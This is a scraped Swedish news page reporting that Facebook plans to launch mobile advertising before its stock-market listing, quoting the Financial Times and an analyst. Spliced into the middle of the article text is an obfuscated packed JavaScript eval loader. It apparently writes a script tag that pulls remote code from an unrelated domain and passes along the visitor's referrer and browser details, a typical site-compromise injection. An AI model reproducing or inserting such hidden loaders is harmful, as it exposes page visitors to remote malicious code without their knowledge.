Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Nu lanserar Facebook mobilreklam

Nu lanserar Facebook mobilreklam
Sebastian

Financial eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kryei|var|u0026u|referrer|bbhfy||js|php’.split(’|’),0,{}))
Times meddelar med hänvisning till källor med insyn i planerna att Facebook nu börjar med annonser i mobilen i början av mars.

Facebook lämnade in ett prospekt förra veckan till den amerikanska finansinspektionen inför börsnoteringen som väntas ske i maj. 425 miljoner användare besöker Facebook via mobilen eller surfplatta varje månad. Idag finns det inte reklam på dessa enheter och det vill Facebook nu ändra på.

”Vi genererar just nu ingen betydande omsättning från Facebooks mobila produkter och vår förmåga att göra det är oprövad”, skriver företaget.

– Allt fler människor skaffar smarttelefoner och tillbringar mer tid på nätet via mobila enheter. Det kommer att bli en stor del av Facebookanvändandet i framtiden. De måste hitta ett smart sätt att tjäna pengar på det, säger Ian Maude, analytiker på Enders Analysis, till Financial Times.